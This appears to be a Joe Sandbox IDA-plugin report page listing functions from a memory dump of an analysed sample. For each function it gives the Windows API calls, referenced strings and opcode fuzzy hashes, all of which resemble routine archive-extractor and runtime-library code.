Associated: 00000000.00000002.2052868036.0000000000861000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052968649.0000000000862000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_800000_5U9CuGu1ru.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cdea74a856748e32d71362983ae628157455d9c3c3db987a3b6dcd5cc6f9433d
Instruction ID: d73e91d41714468c2cf2c35db13887cf30a7e143204960c5a90c4e0a13889380
Opcode Fuzzy Hash: cdea74a856748e32d71362983ae628157455d9c3c3db987a3b6dcd5cc6f9433d
Instruction Fuzzy Hash: 6551C0316083D54EC712CF28998456FBFE1FEEA314F494C9EE4E59B252D2209649CB93

Function 0080F968 Relevance: .1, Instructions: 131COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2052792493.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true

Associated: 00000000.00000002.2052764716.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052835974.0000000000833000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052868036.000000000083E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052868036.0000000000844000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052868036.0000000000861000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052968649.0000000000862000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_800000_5U9CuGu1ru.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f4f4d0100f814ca1188dd6d6eeabe8d97e5a6dc1406602465c326374e3c2a2f0
Instruction ID: 8cff9f59a17f86fe0c46c1b404ff9de36445580df5b9ce090040cc2ec676b09e
Opcode Fuzzy Hash: f4f4d0100f814ca1188dd6d6eeabe8d97e5a6dc1406602465c326374e3c2a2f0
Instruction Fuzzy Hash: 27513571A083158BC748CF19D88055AF7E1FFC8354F058A2EE889E3741DB34E959CB96

Function 008137C1 Relevance: .1, Instructions: 112COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2052792493.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true

Associated: 00000000.00000002.2052764716.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052835974.0000000000833000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052868036.000000000083E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052868036.0000000000844000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052868036.0000000000861000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052968649.0000000000862000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_800000_5U9CuGu1ru.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 680dd35d5b71cc1049d84931067584ed44f7cee91fcb56c6d02cf908e44fe073
Instruction ID: 9ded4da858d50311e981399739cca3e20443195d28147e113995fcb8e4aa5933
Opcode Fuzzy Hash: 680dd35d5b71cc1049d84931067584ed44f7cee91fcb56c6d02cf908e44fe073
Instruction Fuzzy Hash: 5031E5B16047498FCB14DF28C8512AABBE4FF95310F10892DE4E5C7782C735EA89CB92

Function 00805F3C Relevance: .1, Instructions: 76COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2052792493.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true

Associated: 00000000.00000002.2052764716.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052835974.0000000000833000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052868036.000000000083E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052868036.0000000000844000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052868036.0000000000861000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052968649.0000000000862000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_800000_5U9CuGu1ru.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f05d7d1f48a99974d707d0af9517929f17a885840a44ccb0d617c5d85aa25721
Instruction ID: 742946792813b1273fc1804af36a2368211358aa4c470e2f7c2e87f817d5c14b
Opcode Fuzzy Hash: f05d7d1f48a99974d707d0af9517929f17a885840a44ccb0d617c5d85aa25721
Instruction Fuzzy Hash: 0A21B332A255764BCB88CE2DDC9083B7765F786311746812BEB46DB2E1C538E925CBE0

Function 0080DA98 Relevance: 26.5, APIs: 12, Strings: 3, Instructions: 236COMMON

Download Yara Rule

APIs

_swprintf.LIBCMT ref: 0080DABE

Part of subcall function 0080400A: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 0080401D

Part of subcall function 00811596: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000200,00000000,00000000,?,00840EE8,00000200,0080D202,00000000,?,00000050,00840EE8), ref: 008115B3

_strlen.LIBCMT ref: 0080DADF
SetDlgItemTextW.USER32(?,0083E154,?), ref: 0080DB3F
GetWindowRect.USER32(?,?), ref: 0080DB79
GetClientRect.USER32(?,?), ref: 0080DB85
GetWindowLongW.USER32(?,000000F0), ref: 0080DC25
GetWindowRect.USER32(?,?), ref: 0080DC52
SetWindowTextW.USER32(?,?), ref: 0080DC95
GetSystemMetrics.USER32(00000008), ref: 0080DC9D
GetWindow.USER32(?,00000005), ref: 0080DCA8
GetWindowRect.USER32(00000000,?), ref: 0080DCD5
GetWindow.USER32(00000000,00000002), ref: 0080DD47

Strings

$%s:, xrefs: 0080DAB2
CAPTION, xrefs: 0080DC77
d, xrefs: 0080DBA5

Memory Dump Source

Source File: 00000000.00000002.2052792493.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true

Associated: 00000000.00000002.2052764716.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052835974.0000000000833000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052868036.000000000083E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052868036.0000000000844000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052868036.0000000000861000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052968649.0000000000862000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_800000_5U9CuGu1ru.jbxd

Similarity

API ID: Window$Rect$Text$ByteCharClientItemLongMetricsMultiSystemWide__vswprintf_c_l_strlen_swprintf
String ID: $%s:$CAPTION$d
API String ID: 2407758923-2512411981
Opcode ID: 410c33fcf34116a6a6e8a67e206fe9f4b03ac7a0e7e77eb794592807dda1c570
Instruction ID: b7816474866ade32366dbcf40f673235879644bd4bec64390fa4577c3b7ac734
Opcode Fuzzy Hash: 410c33fcf34116a6a6e8a67e206fe9f4b03ac7a0e7e77eb794592807dda1c570
Instruction Fuzzy Hash: 7B819172108701AFD750DFA8CD89A6BBBE9FBC9704F05191DFA84E3291D670E909CB52

Function 0082C233 Relevance: 19.6, APIs: 13, Instructions: 114COMMONLIBRARYCODE

Download Yara Rule

APIs

___free_lconv_mon.LIBCMT ref: 0082C277

Part of subcall function 0082BE12: _free.LIBCMT ref: 0082BE2F
Part of subcall function 0082BE12: _free.LIBCMT ref: 0082BE41
Part of subcall function 0082BE12: _free.LIBCMT ref: 0082BE53
Part of subcall function 0082BE12: _free.LIBCMT ref: 0082BE65
Part of subcall function 0082BE12: _free.LIBCMT ref: 0082BE77
Part of subcall function 0082BE12: _free.LIBCMT ref: 0082BE89
Part of subcall function 0082BE12: _free.LIBCMT ref: 0082BE9B
Part of subcall function 0082BE12: _free.LIBCMT ref: 0082BEAD
Part of subcall function 0082BE12: _free.LIBCMT ref: 0082BEBF
Part of subcall function 0082BE12: _free.LIBCMT ref: 0082BED1
Part of subcall function 0082BE12: _free.LIBCMT ref: 0082BEE3
Part of subcall function 0082BE12: _free.LIBCMT ref: 0082BEF5
Part of subcall function 0082BE12: _free.LIBCMT ref: 0082BF07

_free.LIBCMT ref: 0082C26C

Part of subcall function 008284DE: RtlFreeHeap.NTDLL(00000000,00000000,?,0082BFA7,00833958,00000000,00833958,00000000,?,0082BFCE,00833958,00000007,00833958,?,0082C3CB,00833958), ref: 008284F4
Part of subcall function 008284DE: GetLastError.KERNEL32(00833958,?,0082BFA7,00833958,00000000,00833958,00000000,?,0082BFCE,00833958,00000007,00833958,?,0082C3CB,00833958,00833958), ref: 00828506

_free.LIBCMT ref: 0082C28E
_free.LIBCMT ref: 0082C2A3
_free.LIBCMT ref: 0082C2AE
_free.LIBCMT ref: 0082C2D0
_free.LIBCMT ref: 0082C2E3
_free.LIBCMT ref: 0082C2F1
_free.LIBCMT ref: 0082C2FC
_free.LIBCMT ref: 0082C334
_free.LIBCMT ref: 0082C33B
_free.LIBCMT ref: 0082C358
_free.LIBCMT ref: 0082C370

Memory Dump Source

Source File: 00000000.00000002.2052792493.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true

Associated: 00000000.00000002.2052764716.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052835974.0000000000833000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052868036.000000000083E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052868036.0000000000844000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052868036.0000000000861000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052968649.0000000000862000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_800000_5U9CuGu1ru.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast___free_lconv_mon
String ID:
API String ID: 161543041-0
Opcode ID: 217796220b4a36a2206e66724421c945646a6ae27836c3e71019ca45c8060ffc
Instruction ID: 8efc9efa34debb734e11856f8809a6b0302150d1fff877c979894979baa84fa3
Opcode Fuzzy Hash: 217796220b4a36a2206e66724421c945646a6ae27836c3e71019ca45c8060ffc
Instruction Fuzzy Hash: 30316B32601225DFEF20AA7CF945B6A77E9FF00310F1488A9E449DB691DF31ACC08B65

Function 0081CD2E Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 79windowCOMMON

Download Yara Rule

APIs

GetWindow.USER32(?,00000005), ref: 0081CD51
GetClassNameW.USER32(00000000,?,00000800), ref: 0081CD7D

Part of subcall function 008117AC: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_000117AC,0080BB05,00000000,.exe,?,?,00000800,?,?,008185DF,?), ref: 008117C2

GetWindowLongW.USER32(00000000,000000F0), ref: 0081CD99
SendMessageW.USER32(00000000,00000173,00000000,00000000), ref: 0081CDB0
GetObjectW.GDI32(00000000,00000018,?), ref: 0081CDC4
SendMessageW.USER32(00000000,00000172,00000000,00000000), ref: 0081CDED
DeleteObject.GDI32(00000000), ref: 0081CDF4
GetWindow.USER32(00000000,00000002), ref: 0081CDFD

Strings

STATIC, xrefs: 0081CD83

Memory Dump Source

Source File: 00000000.00000002.2052792493.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true

Associated: 00000000.00000002.2052764716.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052835974.0000000000833000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052868036.000000000083E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052868036.0000000000844000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052868036.0000000000861000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052968649.0000000000862000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_800000_5U9CuGu1ru.jbxd

Similarity

API ID: Window$MessageObjectSend$ClassCompareDeleteLongNameString
String ID: STATIC
API String ID: 3820355801-1882779555
Opcode ID: fbd688e77f37a7869a5cc620a9b7fa4d16eb8f9ff874ed5a104b0d73bce39d92
Instruction ID: a1cf5b2183df7e603242f21df0f8104f2a96111d0b01c1ca3c9976cd93e54a42
Opcode Fuzzy Hash: fbd688e77f37a7869a5cc620a9b7fa4d16eb8f9ff874ed5a104b0d73bce39d92
Instruction Fuzzy Hash: DF115932184B20BBE3306B34EC0AFEF765CFF45740F014420FA42E10D2CAA4899686B3

Function 00828EB1 Relevance: 15.1, APIs: 10, Instructions: 54COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 00828EC5

Part of subcall function 008284DE: RtlFreeHeap.NTDLL(00000000,00000000,?,0082BFA7,00833958,00000000,00833958,00000000,?,0082BFCE,00833958,00000007,00833958,?,0082C3CB,00833958), ref: 008284F4
Part of subcall function 008284DE: GetLastError.KERNEL32(00833958,?,0082BFA7,00833958,00000000,00833958,00000000,?,0082BFCE,00833958,00000007,00833958,?,0082C3CB,00833958,00833958), ref: 00828506

_free.LIBCMT ref: 00828ED1
_free.LIBCMT ref: 00828EDC
_free.LIBCMT ref: 00828EE7
_free.LIBCMT ref: 00828EF2
_free.LIBCMT ref: 00828EFD
_free.LIBCMT ref: 00828F08
_free.LIBCMT ref: 00828F13
_free.LIBCMT ref: 00828F1E
_free.LIBCMT ref: 00828F2C

Memory Dump Source

Source File: 00000000.00000002.2052792493.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true

Associated: 00000000.00000002.2052764716.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052835974.0000000000833000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052868036.000000000083E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052868036.0000000000844000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052868036.0000000000861000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052968649.0000000000862000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_800000_5U9CuGu1ru.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 0e939941efef4c597e7ca3d97ad213524306c0207e4271eec4ae99a7552ca64d
Instruction ID: 66fd738d67fa70f2992169d8bc80442bcf208c4057f8930814a159322fa34c0d
Opcode Fuzzy Hash: 0e939941efef4c597e7ca3d97ad213524306c0207e4271eec4ae99a7552ca64d
Instruction Fuzzy Hash: 9611A47650111DFFCF11FF98E842CDA3BA5FF04350B5140E5BA088B626DA31DA919F86

Function 00802162 Relevance: 14.5, APIs: 5, Strings: 3, Instructions: 480COMMON

Download Yara Rule

Strings

xc%u, xrefs: 008026D7
;%u, xrefs: 00802497
x%u, xrefs: 0080267A

Memory Dump Source

Source File: 00000000.00000002.2052792493.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true

Associated: 00000000.00000002.2052764716.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052835974.0000000000833000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052868036.000000000083E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052868036.0000000000844000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052868036.0000000000861000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052968649.0000000000862000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_800000_5U9CuGu1ru.jbxd

Similarity

API ID:
String ID: ;%u$x%u$xc%u
API String ID: 0-2277559157
Opcode ID: 87b4e430245b1d99bb6edd94b71019f9261a734a8e34c696be37d482298edf0b
Instruction ID: ff43c2b88ecdfaa35fe8ae59c09beb72e83dea10b6b4bccdea7d6ddf76acbc1b
Opcode Fuzzy Hash: 87b4e430245b1d99bb6edd94b71019f9261a734a8e34c696be37d482298edf0b
Instruction Fuzzy Hash: 14F118716042405BDBA5EF388C99BEE7799FFA1300F08056DF985CB2C3DAA59844C7A3

Function 0081ACD0 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 98windowCOMMON

Download Yara Rule

APIs

Part of subcall function 0080130B: GetDlgItem.USER32(00000000,00003021), ref: 0080134F
Part of subcall function 0080130B: SetWindowTextW.USER32(00000000,008335B4), ref: 00801365

EndDialog.USER32(?,00000001), ref: 0081AD20
SendMessageW.USER32(?,00000080,00000001,?), ref: 0081AD47
SendDlgItemMessageW.USER32(?,00000066,00000172,00000000,?), ref: 0081AD60
SetWindowTextW.USER32(?,?), ref: 0081AD71
GetDlgItem.USER32(?,00000065), ref: 0081AD7A
SendMessageW.USER32(00000000,00000435,00000000,00010000), ref: 0081AD8E
SendMessageW.USER32(00000000,00000443,00000000,00000000), ref: 0081ADA4

Strings

LICENSEDLG, xrefs: 0081ACE4

Memory Dump Source

Source File: 00000000.00000002.2052792493.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true

Associated: 00000000.00000002.2052764716.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052835974.0000000000833000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052868036.000000000083E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052868036.0000000000844000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052868036.0000000000861000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052968649.0000000000862000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_800000_5U9CuGu1ru.jbxd

Similarity

API ID: MessageSend$Item$TextWindow$Dialog
String ID: LICENSEDLG
API String ID: 3214253823-2177901306
Opcode ID: 362c844008482fa0dd1e5ee9119073ea5a9f69762b3d7bda4915b139569048cd
Instruction ID: e4a6a26a659079e8f424d1339f5f27beec17a223bebf9983a0c11bd3cfb12906
Opcode Fuzzy Hash: 362c844008482fa0dd1e5ee9119073ea5a9f69762b3d7bda4915b139569048cd
Instruction Fuzzy Hash: E721E531245A05BBD2295F75FD49EBB3B6DFF46B46F020054F604E24A0DBA6AD80D633

Function 00809443 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 136fileCOMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00809448
GetLongPathNameW.KERNEL32(?,?,00000800), ref: 0080946B
GetShortPathNameW.KERNEL32(?,?,00000800), ref: 0080948A

Part of subcall function 008117AC: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_000117AC,0080BB05,00000000,.exe,?,?,00000800,?,?,008185DF,?), ref: 008117C2

_swprintf.LIBCMT ref: 00809526

Part of subcall function 0080400A: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 0080401D

MoveFileW.KERNEL32(?,?), ref: 00809595
MoveFileW.KERNEL32(?,?), ref: 008095D5

Strings

rtmp%d, xrefs: 0080950F

Memory Dump Source

Source File: 00000000.00000002.2052792493.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true

Associated: 00000000.00000002.2052764716.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052835974.0000000000833000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052868036.000000000083E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052868036.0000000000844000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052868036.0000000000861000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052968649.0000000000862000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_800000_5U9CuGu1ru.jbxd

Similarity

API ID: FileMoveNamePath$CompareH_prologLongShortString__vswprintf_c_l_swprintf
String ID: rtmp%d
API String ID: 2111052971-3303766350
Opcode ID: d0e2bc44c786db52d388799bc5fe29607301f1983d782d93e1f5eb0a45b7e74b
Instruction ID: 0e92b1c830bca63a8ba383edf780443c3213db033d0f3326609612c3a6e43809
Opcode Fuzzy Hash: d0e2bc44c786db52d388799bc5fe29607301f1983d782d93e1f5eb0a45b7e74b
Instruction Fuzzy Hash: 23415E71900258A6DF70EBA48C85ADB737CFF65380F0444E5F699E3192EB748B88CA65

Function 00818E62 Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 125memoryCOMMON

Download Yara Rule

APIs

GlobalAlloc.KERNEL32(00000040,?), ref: 00818F38
WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,00000003,?,00000000,00000000), ref: 00818F59
CreateStreamOnHGlobal.COMBASE(00000000,00000001,00000000), ref: 00818F80

Strings

<html>, xrefs: 00818EA7, 00818EE0
</html>, xrefs: 00818F0A
utf-8"></head>, xrefs: 00818EBD
<head><meta http-equiv="content-type" content="text/html; charset=, xrefs: 00818EB2

Memory Dump Source

Source File: 00000000.00000002.2052792493.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true

Associated: 00000000.00000002.2052764716.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052835974.0000000000833000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052868036.000000000083E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052868036.0000000000844000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052868036.0000000000861000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052968649.0000000000862000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_800000_5U9CuGu1ru.jbxd

Similarity

API ID: Global$AllocByteCharCreateMultiStreamWide
String ID: </html>$<head><meta http-equiv="content-type" content="text/html; charset=$<html>$utf-8"></head>
API String ID: 4094277203-4209811716
Opcode ID: 57d691d4c6f19548d8ce7497d5077ae2960058b45dade410adb69f57a29894d5
Instruction ID: 2e410978efb2807ce76b25288f7beb7119a0312e12889817bfad57a9a2d0374a
Opcode Fuzzy Hash: 57d691d4c6f19548d8ce7497d5077ae2960058b45dade410adb69f57a29894d5
Instruction Fuzzy Hash: D8311831508715BBD721AB28AC07FEF775DFF81760F100519F811D62C1EF689A8983A6

Function 00810A8A Relevance: 12.1, APIs: 8, Instructions: 115timeCOMMON

Download Yara Rule

APIs

__aulldiv.LIBCMT ref: 00810A9D

Part of subcall function 0080ACF5: GetVersionExW.KERNEL32(?), ref: 0080AD1A

FileTimeToLocalFileTime.KERNEL32(?,00000001,00000000,?,00000064,00000000,00000001,00000000,?), ref: 00810AC0
FileTimeToSystemTime.KERNEL32(?,?,00000000,?,00000064,00000000,00000001,00000000,?), ref: 00810AD2
SystemTimeToTzSpecificLocalTime.KERNEL32(00000000,?,?), ref: 00810AE3
SystemTimeToFileTime.KERNEL32(?,?), ref: 00810AF3
SystemTimeToFileTime.KERNEL32(?,?), ref: 00810B03
FileTimeToSystemTime.KERNEL32(?,?), ref: 00810B3D
__aullrem.LIBCMT ref: 00810BCB

Memory Dump Source

Source File: 00000000.00000002.2052792493.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true

Associated: 00000000.00000002.2052764716.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052835974.0000000000833000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052868036.000000000083E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052868036.0000000000844000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052868036.0000000000861000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052968649.0000000000862000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_800000_5U9CuGu1ru.jbxd

Similarity

API ID: Time$File$System$Local$SpecificVersion__aulldiv__aullrem
String ID:
API String ID: 1247370737-0
Opcode ID: d9af689a9f2c8e34b3f48d9a3220dad084ccd5f513f09f4b0af5f6c1bc6072d3
Instruction ID: d17968a80223fd5df3e51ccdc4fe19172161c9fa3bd7fc6904141127c870f5a5
Opcode Fuzzy Hash: d9af689a9f2c8e34b3f48d9a3220dad084ccd5f513f09f4b0af5f6c1bc6072d3
Instruction Fuzzy Hash: EA4116B14083069FC314DF64C8809ABBBE8FF88715F004E2EF596D2650E779E589CB52

Function 0082EE2D Relevance: 10.7, APIs: 7, Instructions: 152fileCOMMON

Download Yara Rule

APIs

GetConsoleCP.KERNEL32(?,00000000,?,?,?,?,?,?,?,0082F5A2,?,00000000,?,00000000,00000000), ref: 0082EE6F
__fassign.LIBCMT ref: 0082EEEA
__fassign.LIBCMT ref: 0082EF05
WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,?,00000005,00000000,00000000), ref: 0082EF2B
WriteFile.KERNEL32(?,?,00000000,0082F5A2,00000000,?,?,?,?,?,?,?,?,?,0082F5A2,?), ref: 0082EF4A
WriteFile.KERNEL32(?,?,00000001,0082F5A2,00000000,?,?,?,?,?,?,?,?,?,0082F5A2,?), ref: 0082EF83

Memory Dump Source

Source File: 00000000.00000002.2052792493.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true

Associated: 00000000.00000002.2052764716.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052835974.0000000000833000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052868036.000000000083E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052868036.0000000000844000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052868036.0000000000861000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052968649.0000000000862000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_800000_5U9CuGu1ru.jbxd

Similarity

API ID: FileWrite__fassign$ByteCharConsoleMultiWide
String ID:
API String ID: 1324828854-0
Opcode ID: a5152359e8abe7d61603f165c508076ba3fd0beea1b7559ec49d915da8258fe0
Instruction ID: 9bfe02a5bfa226dd877cef4d0f18e73c0eee23b09dc4549c1bc9fbba56adc361
Opcode Fuzzy Hash: a5152359e8abe7d61603f165c508076ba3fd0beea1b7559ec49d915da8258fe0
Instruction Fuzzy Hash: F851E671E002199FCB10CFA8ED45AEEBBF9FF09300F14455AE955E7291DB709980CB65

Function 0081C534 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 135COMMON

Download Yara Rule

APIs

GetTempPathW.KERNEL32(00000800,?), ref: 0081C54A
_swprintf.LIBCMT ref: 0081C57E

Part of subcall function 0080400A: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 0080401D

SetDlgItemTextW.USER32(?,00000066,0084946A), ref: 0081C59E
_wcschr.LIBVCRUNTIME ref: 0081C5D1
EndDialog.USER32(?,00000001), ref: 0081C6B2

Strings

%s%s%u, xrefs: 0081C573

Memory Dump Source

Source File: 00000000.00000002.2052792493.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true

Associated: 00000000.00000002.2052764716.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052835974.0000000000833000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052868036.000000000083E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052868036.0000000000844000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052868036.0000000000861000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052968649.0000000000862000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_800000_5U9CuGu1ru.jbxd

Similarity

API ID: DialogItemPathTempText__vswprintf_c_l_swprintf_wcschr
String ID: %s%s%u
API String ID: 2892007947-1360425832
Opcode ID: 4a5dc7fed060df2207f6331940b1d46784f6c3fa67970ec7bcc5fd6d555242c9
Instruction ID: 6e9e3b0c74019ca767843af1b625bf5515a6cc9e2188c0f3e33c0d5dffb9fcdd
Opcode Fuzzy Hash: 4a5dc7fed060df2207f6331940b1d46784f6c3fa67970ec7bcc5fd6d555242c9
Instruction Fuzzy Hash: D141F0B1D4061CAADB26DBA4DC45EEA7BBDFF08305F0040A6E509E70A1EB759BC4CB51

Function 00819635 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 108COMMON

Download Yara Rule

APIs

ShowWindow.USER32(?,00000000), ref: 0081964E
